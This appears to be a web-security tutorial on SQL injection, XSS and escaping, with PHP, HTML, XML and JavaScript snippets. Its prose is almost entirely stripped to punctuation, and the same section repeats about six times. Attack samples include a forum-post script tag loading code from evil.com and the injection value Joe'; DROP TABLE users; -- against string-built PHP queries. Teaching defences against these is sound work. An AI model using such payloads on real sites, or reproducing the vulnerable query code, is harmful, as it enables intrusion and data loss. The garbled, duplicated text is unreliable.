<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
